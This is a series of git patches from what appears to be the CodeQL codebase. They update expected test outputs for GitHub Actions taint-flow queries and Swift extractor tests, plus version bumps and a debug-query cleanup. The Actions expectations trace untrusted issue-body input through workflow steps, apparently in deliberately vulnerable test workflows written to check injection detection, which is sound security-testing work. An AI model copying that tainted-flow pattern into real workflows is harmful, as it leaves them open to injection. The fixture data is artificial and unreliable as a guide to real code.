.github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 45b75470163844bba676e54b7ee138980f374bb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:38:38 +0100 Subject: [PATCH 0669/1267] chore: clean up partial.ql debug query --- ql/src/Debug/partial.ql | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index c1578220b6b..cb8ba7873d8 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -18,9 +18,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - //source.getLocation().getFile().getBaseName() = "non-existant-test.yml" - source.getLocation().getFile().getBaseName() = "test16.yml" and - source.getLocation().getStartLine() = 125 + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" } predicate isSink(DataFlow::Node sink) { none() } From c6048a6fa1d7bfb558b9b147aaf790b72248d81b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 14:16:56 +0100 Subject: [PATCH 0670/1267] tests: Update tests --- ql/test/library-tests/test.expected | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 8d3e4193c69..a8cf50334ce 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1559,6 +1559,7 @@ sources | martinhaintz/ga-file-list | * | output.file_names | filename | manual | | martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| peter-murray/issue-forms-body-parser | * | output.payload | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | @@ -1703,6 +1704,7 @@ summaries | tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | | tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | | traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zentered/issue-forms-body-parser | * | input.body | output.data | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | From 230b2ff4d8773354ffc16e82898ac99b605202bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 14:17:44 +0100 Subject: [PATCH 0671/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5f8abdce20..d087f03b152 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.82 +version: 0.1.83 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c0f849e1f3e..073ddf5b457 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.82 +version: 0.1.83 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1f356078ffba27313907c0b6ac12c64f2385b813 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 31 Oct 2024 15:57:31 +0100 Subject: [PATCH 0672/1267] Swift: temporarily accept test changes --- .../CONSISTENCY/UnresolvedAstNodes.expected | 3 +- .../extractor-tests/expressions/all.expected | 3 +- .../decl/CapturedDecl/PrintAst.expected | 1 + .../decl/MacroDecl/MacroDecl_getRole.expected | 8 +- .../decl/MacroDecl/MacroRole.expected | 14 +++- .../decl/MacroDecl/MacroRole_getName.expected | 2 + .../KeyPathExpr/KeyPathExpr_getRoot.expected | 2 +- .../KeyPathExpr/KeyPathExpr_getType.expected | 2 +- .../MethodLookupExpr_getType.expected | 4 +- .../OpaqueTypeArchetypeType.expected | 2 +- ...aqueTypeArchetypeType_getProtocol.expected | 10 --- .../PackType/ElementArchetypeType.expected | 2 +- .../ElementArchetypeType_getProtocol.expected | 2 + .../type/PackType/PackArchetypeType.expected | 3 +- .../PackArchetypeType_getProtocol.expected | 4 + .../PrimaryArchetypeType.expected | 2 +- .../PrimaryArchetypeType_getProtocol.expected | 2 + .../test/library-tests/ast/PrintAst.expected | 8 +- .../controlflow/graph/Cfg.expected | 15 ++-- .../dataflow/dataflow/DataFlow.expected | 13 ---- .../dataflow/dataflow/DataFlowInline.expected | 3 +- .../dataflow/taint/core/LocalTaint.expected | 64 ++++++---------- .../dataflow/taint/core/Taint.expected | 73 ------------------- .../dataflow/taint/core/TaintInline.expected | 17 ++++- .../taint/libraries/TaintInline.expected | 13 +++- .../type/nominaltype/nominaltype.expected | 2 +- .../type/nominaltype/nominaltypedecl.expected | 2 +- .../CWE-020/MissingRegexAnchor.expected | 3 - .../Security/CWE-611/XXETest.expected | 18 ++++- 29 files changed, 121 insertions(+), 176 deletions(-) diff --git a/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected b/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected index c88a81e5fc7..c777fe0ebb5 100644 --- a/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected +++ b/swift/ql/test/extractor-tests/errors/CONSISTENCY/UnresolvedAstNodes.expected @@ -1,2 +1 @@ -| file://:0:0:0:0 | ... .combine(_:) | -| unresolved.swift:5:1:5:14 | UnresolvedSpecializeExpr | +| unresolved.swift:5:1:5:14 | UnresolvedSpecializeExpr | UnresolvedSpecializeExpr | diff --git a/swift/ql/test/extractor-tests/expressions/all.expected b/swift/ql/test/extractor-tests/expressions/all.expected index bc8fae6529b..0dd7091c1f9 100644 --- a/swift/ql/test/extractor-tests/expressions/all.expected +++ b/swift/ql/test/extractor-tests/expressions/all.expected @@ -6,8 +6,8 @@ | expressions.swift:6:9:6:9 | hello world | StringLiteralExpr | | expressions.swift:7:10:7:10 | "..." | InterpolatedStringLiteralExpr | | expressions.swift:7:10:7:10 | OpaqueValueExpr | OpaqueValueExpr | -| expressions.swift:7:10:7:10 | TapExpr | TapExpr | | expressions.swift:7:10:7:10 | hello | StringLiteralExpr | +| expressions.swift:7:10:7:21 | TapExpr | TapExpr | | expressions.swift:7:11:7:10 | call to appendLiteral(_:) | CallExpr | | expressions.swift:7:11:7:11 | $interpolation | DeclRefExpr | | expressions.swift:7:11:7:11 | &... | InOutExpr | @@ -133,7 +133,6 @@ | expressions.swift:60:1:60:63 | call to withUnsafePointer(to:_:) | CallExpr | | expressions.swift:60:23:60:23 | (Int) ... | LoadExpr | | expressions.swift:60:23:60:23 | myNumber | DeclRefExpr | -| expressions.swift:60:33:60:63 | ((UnsafePointer) throws -> ()) ... | FunctionConversionExpr | | expressions.swift:60:33:60:63 | { ... } | ExplicitClosureExpr | | expressions.swift:60:35:60:35 | unsafeFunction(pointer:) | DeclRefExpr | | expressions.swift:60:35:60:61 | call to unsafeFunction(pointer:) | CallExpr | diff --git a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected index d7f64e2a81a..c3ae0bba4c0 100644 --- a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected +++ b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.expected @@ -251,6 +251,7 @@ closures.swift: # 42| getArgument(2): [Argument] terminator: default terminator # 42| getExpr(): [DefaultArgumentExpr] default terminator # 42| getCapture(0): [CapturedDecl] wrapper(_:) +# 41| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 45| getElement(1): [CallExpr] call to withCallback(_:) # 45| getFunction(): [DeclRefExpr] withCallback(_:) # 45| getArgument(0): [Argument] : { ... } diff --git a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected index 0cc8daaa5b8..faa0a6256a6 100644 --- a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected +++ b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroDecl_getRole.expected @@ -1,4 +1,4 @@ -| test.swift:2:1:2:50 | MacroDecl | 0 | test.swift:1:14:1:26 | #freestanding(declaration) | -| test.swift:4:1:4:15 | MacroDecl | 0 | test.swift:3:14:3:25 | #freestanding(expression) | -| test.swift:7:1:7:15 | MacroDecl | 0 | test.swift:6:10:6:20 | @attached(extension) | -| test.swift:7:1:7:15 | MacroDecl | 1 | test.swift:5:10:5:17 | @attached(member) | +| test.swift:2:1:2:50 | MacroDecl | 0 | test.swift:1:2:1:26 | #freestanding(declaration) | +| test.swift:4:1:4:15 | MacroDecl | 0 | test.swift:3:2:3:25 | #freestanding(expression) | +| test.swift:7:1:7:15 | MacroDecl | 0 | test.swift:6:2:6:20 | @attached(extension) | +| test.swift:7:1:7:15 | MacroDecl | 1 | test.swift:5:2:5:17 | @attached(member) | diff --git a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected index c83b5e45590..036d4f7ff6e 100644 --- a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected +++ b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole.expected @@ -8,7 +8,13 @@ | file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | | file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | | file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:1:14:1:26 | #freestanding(declaration) | getKind: | 2 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:3:14:3:25 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:5:10:5:17 | @attached(member) | getKind: | 16 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | -| test.swift:6:10:6:20 | @attached(extension) | getKind: | 256 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(accessor) | getKind: | 4 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(member) | getKind: | 16 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(memberAttribute) | getKind: | 8 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| file://:0:0:0:0 | @attached(peer) | getKind: | 32 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 1 | +| file://:0:0:0:0 | @attached(peer) | getKind: | 32 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 1 | +| test.swift:1:2:1:26 | #freestanding(declaration) | getKind: | 2 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| test.swift:3:2:3:25 | #freestanding(expression) | getKind: | 1 | getMacroSyntax: | 0 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| test.swift:5:2:5:17 | @attached(member) | getKind: | 16 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | +| test.swift:6:2:6:20 | @attached(extension) | getKind: | 256 | getMacroSyntax: | 1 | getNumberOfConformances: | 0 | getNumberOfNames: | 0 | diff --git a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected index e69de29bb2d..0c42bfc4601 100644 --- a/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected +++ b/swift/ql/test/extractor-tests/generated/decl/MacroDecl/MacroRole_getName.expected @@ -0,0 +1,2 @@ +| file://:0:0:0:0 | @attached(peer) | 0 | $() | +| file://:0:0:0:0 | @attached(peer) | 0 | _lldb_summary() | diff --git a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected index 5e391528d7c..4106b8b42fa 100644 --- a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected +++ b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getRoot.expected @@ -1,7 +1,7 @@ | key_path_expr.swift:11:12:11:17 | #keyPath(...) | key_path_expr.swift:11:13:11:13 | Foo | | key_path_expr.swift:12:18:12:26 | #keyPath(...) | key_path_expr.swift:12:19:12:23 | [Int] | | key_path_expr.swift:13:19:13:38 | #keyPath(...) | key_path_expr.swift:13:20:13:33 | [String : Int] | -| key_path_expr.swift:14:16:14:35 | #keyPath(...) | key_path_expr.swift:14:17:14:29 | Int? | +| key_path_expr.swift:14:16:14:35 | #keyPath(...) | key_path_expr.swift:14:17:14:29 | Optional | | key_path_expr.swift:15:16:15:26 | #keyPath(...) | key_path_expr.swift:15:17:15:17 | Foo | | key_path_expr.swift:16:20:16:30 | #keyPath(...) | key_path_expr.swift:16:21:16:21 | Foo | | key_path_expr.swift:17:11:17:16 | #keyPath(...) | key_path_expr.swift:17:12:17:12 | Int | diff --git a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected index cdf1ac3d9f8..de0945572cf 100644 --- a/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected +++ b/swift/ql/test/extractor-tests/generated/expr/KeyPathExpr/KeyPathExpr_getType.expected @@ -1,7 +1,7 @@ | key_path_expr.swift:11:12:11:17 | #keyPath(...) | WritableKeyPath | | key_path_expr.swift:12:18:12:26 | #keyPath(...) | WritableKeyPath<[Int], Int> | | key_path_expr.swift:13:19:13:38 | #keyPath(...) | WritableKeyPath<[String : Int], Int?> | -| key_path_expr.swift:14:16:14:35 | #keyPath(...) | WritableKeyPath | +| key_path_expr.swift:14:16:14:35 | #keyPath(...) | WritableKeyPath, Int> | | key_path_expr.swift:15:16:15:26 | #keyPath(...) | KeyPath | | key_path_expr.swift:16:20:16:30 | #keyPath(...) | KeyPath | | key_path_expr.swift:17:11:17:16 | #keyPath(...) | WritableKeyPath | diff --git a/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected b/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected index 61f37a4b9a9..7ea638a186c 100644 --- a/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected +++ b/swift/ql/test/extractor-tests/generated/expr/MethodLookupExpr/MethodLookupExpr_getType.expected @@ -13,12 +13,12 @@ | method_lookups.swift:37:11:37:11 | X.init() | () -> X | | method_lookups.swift:37:11:37:15 | (no string representation) | (Int) -> () | | method_lookups.swift:37:15:37:15 | .baz(_:) | (Int) -> () | -| method_lookups.swift:40:1:40:1 | Task.init(priority:operation:) | (TaskPriority?, __owned @escaping @Sendable () async -> ()) -> Task<(), Never> | +| method_lookups.swift:40:1:40:1 | Task.init(priority:operation:) | (TaskPriority?, sending @escaping @isolated(any) () async -> ()) -> Task<(), Never> | | method_lookups.swift:41:3:41:5 | .foo(_:_:) | (Int, Int) -> () | | method_lookups.swift:42:9:42:9 | Y.init() | () -> Y | | method_lookups.swift:42:9:42:13 | .baz(_:) | (Int) -> () | | method_lookups.swift:44:11:44:13 | .foo(_:_:) | (Int, Int) -> () | -| method_lookups.swift:47:1:47:1 | Task.init(priority:operation:) | (TaskPriority?, __owned @escaping @Sendable () async -> ()) -> Task<(), Never> | +| method_lookups.swift:47:1:47:1 | Task.init(priority:operation:) | (TaskPriority?, sending @escaping @isolated(any) () async -> ()) -> Task<(), Never> | | method_lookups.swift:48:9:48:11 | .foo(_:_:) | @MainActor (Int, Int) -> () | | method_lookups.swift:49:9:49:11 | .bar() | () -> () | | method_lookups.swift:50:9:50:9 | Z.init() | @MainActor () -> Z | diff --git a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected index 37921db705d..2b14e261f28 100644 --- a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected +++ b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType.expected @@ -1,4 +1,4 @@ | some Base | getName: | some Base | getCanonicalType: | some Base | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | yes | getNumberOfProtocols: | 0 | getDeclaration: | file://:0:0:0:0 | _ | | some P | getName: | some P | getCanonicalType: | some P | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 1 | getDeclaration: | file://:0:0:0:0 | _ | | some P | getName: | some P | getCanonicalType: | some P | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 1 | getDeclaration: | file://:0:0:0:0 | _ | -| some SignedInteger | getName: | some SignedInteger | getCanonicalType: | some SignedInteger | getInterfaceType: | \u03c4_0_0 | hasSuperclass: | no | getNumberOfProtocols: | 11 | getDeclaration: | file://:0:0:0:0 | _ | +| some SignedInteger | getName: | some SignedInteger | getCanonicalType: | some SignedInteger | getInterfaceType: | \u03c4_0_0 | hasSuperclass: | no | getNumberOfProtocols: | 1 | getDeclaration: | file://:0:0:0:0 | _ | diff --git a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected index 5909813f43d..1ca3b350aeb 100644 --- a/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/OpaqueTypeArchetypeType/OpaqueTypeArchetypeType_getProtocol.expected @@ -1,13 +1,3 @@ | some P | 0 | opaque_types.swift:3:1:3:13 | P | | some P | 0 | opaque_types.swift:3:1:3:13 | P | | some SignedInteger | 0 | file://:0:0:0:0 | SignedInteger | -| some SignedInteger | 1 | file://:0:0:0:0 | BinaryInteger | -| some SignedInteger | 2 | file://:0:0:0:0 | SignedNumeric | -| some SignedInteger | 3 | file://:0:0:0:0 | CustomStringConvertible | -| some SignedInteger | 4 | file://:0:0:0:0 | Hashable | -| some SignedInteger | 5 | file://:0:0:0:0 | Numeric | -| some SignedInteger | 6 | file://:0:0:0:0 | Strideable | -| some SignedInteger | 7 | file://:0:0:0:0 | Equatable | -| some SignedInteger | 8 | file://:0:0:0:0 | AdditiveArithmetic | -| some SignedInteger | 9 | file://:0:0:0:0 | ExpressibleByIntegerLiteral | -| some SignedInteger | 10 | file://:0:0:0:0 | Comparable | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected index aa96f769618..5bfa71a3481 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType.expected @@ -1 +1 @@ -| \u03c4_1_0 | getName: | \u03c4_1_0 | getCanonicalType: | \u03c4_1_0 | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 0 | +| \u03c4_1_0 | getName: | \u03c4_1_0 | getCanonicalType: | \u03c4_1_0 | getInterfaceType: | \u03c4_1_0 | hasSuperclass: | no | getNumberOfProtocols: | 2 | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected index e69de29bb2d..f6d6dae2dc5 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/ElementArchetypeType_getProtocol.expected @@ -0,0 +1,2 @@ +| \u03c4_1_0 | 0 | file://:0:0:0:0 | Copyable | +| \u03c4_1_0 | 1 | file://:0:0:0:0 | Escapable | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected index 2c6bd59936c..c53f468dc52 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType.expected @@ -1 +1,2 @@ -| each T | getName: | each T | getCanonicalType: | each T | getInterfaceType: | each T | hasSuperclass: | no | getNumberOfProtocols: | 0 | +| each Arg | getName: | each Arg | getCanonicalType: | each Arg | getInterfaceType: | each Arg | hasSuperclass: | no | getNumberOfProtocols: | 2 | +| each T | getName: | each T | getCanonicalType: | each T | getInterfaceType: | each T | hasSuperclass: | no | getNumberOfProtocols: | 2 | diff --git a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected index e69de29bb2d..7ba05a259c8 100644 --- a/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/PackType/PackArchetypeType_getProtocol.expected @@ -0,0 +1,4 @@ +| each Arg | 0 | file://:0:0:0:0 | Copyable | +| each Arg | 1 | file://:0:0:0:0 | Escapable | +| each T | 0 | file://:0:0:0:0 | Copyable | +| each T | 1 | file://:0:0:0:0 | Escapable | diff --git a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected index 6bd7bc898e9..2ea99b1e227 100644 --- a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected +++ b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType.expected @@ -2,7 +2,7 @@ | Base | getName: | Base | getCanonicalType: | Base | getInterfaceType: | Base | hasSuperclass: | no | getNumberOfProtocols: | 1 | | Base | getName: | Base | getCanonicalType: | Base | getInterfaceType: | Base | hasSuperclass: | yes | getNumberOfProtocols: | 0 | | Base | getName: | Base | getCanonicalType: | Base | getInterfaceType: | Base | hasSuperclass: | yes | getNumberOfProtocols: | 0 | -| Param | getName: | Param | getCanonicalType: | Param | getInterfaceType: | Param | hasSuperclass: | no | getNumberOfProtocols: | 0 | +| Param | getName: | Param | getCanonicalType: | Param | getInterfaceType: | Param | hasSuperclass: | no | getNumberOfProtocols: | 2 | | ParamWithProtocols | getName: | ParamWithProtocols | getCanonicalType: | ParamWithProtocols | getInterfaceType: | ParamWithProtocols | hasSuperclass: | no | getNumberOfProtocols: | 2 | | ParamWithSuperclass | getName: | ParamWithSuperclass | getCanonicalType: | ParamWithSuperclass | getInterfaceType: | ParamWithSuperclass | hasSuperclass: | yes | getNumberOfProtocols: | 0 | | ParamWithSuperclassAndProtocols | getName: | ParamWithSuperclassAndProtocols | getCanonicalType: | ParamWithSuperclassAndProtocols | getInterfaceType: | ParamWithSuperclassAndProtocols | hasSuperclass: | yes | getNumberOfProtocols: | 2 | diff --git a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected index 361f54b556e..3c0810fd7c2 100644 --- a/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected +++ b/swift/ql/test/extractor-tests/generated/type/PrimaryArchetypeType/PrimaryArchetypeType_getProtocol.expected @@ -1,5 +1,7 @@ | Base | 0 | primary_archetypes.swift:4:1:4:13 | P | | Base | 0 | primary_archetypes.swift:5:1:5:14 | P2 | +| Param | 0 | file://:0:0:0:0 | Copyable | +| Param | 1 | file://:0:0:0:0 | Escapable | | ParamWithProtocols | 0 | file://:0:0:0:0 | Equatable | | ParamWithProtocols | 1 | primary_archetypes.swift:4:1:4:13 | P | | ParamWithSuperclassAndProtocols | 0 | file://:0:0:0:0 | Equatable | diff --git a/swift/ql/test/library-tests/ast/PrintAst.expected b/swift/ql/test/library-tests/ast/PrintAst.expected index 4d12907d3a5..82d866baec9 100644 --- a/swift/ql/test/library-tests/ast/PrintAst.expected +++ b/swift/ql/test/library-tests/ast/PrintAst.expected @@ -3291,6 +3291,7 @@ cfg.swift: # 529| getBase(): [DeclRefExpr] continuation # 529| getMethodRef(): [DeclRefExpr] finish() # 527| getCapture(0): [CapturedDecl] continuation +# 525| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 523| 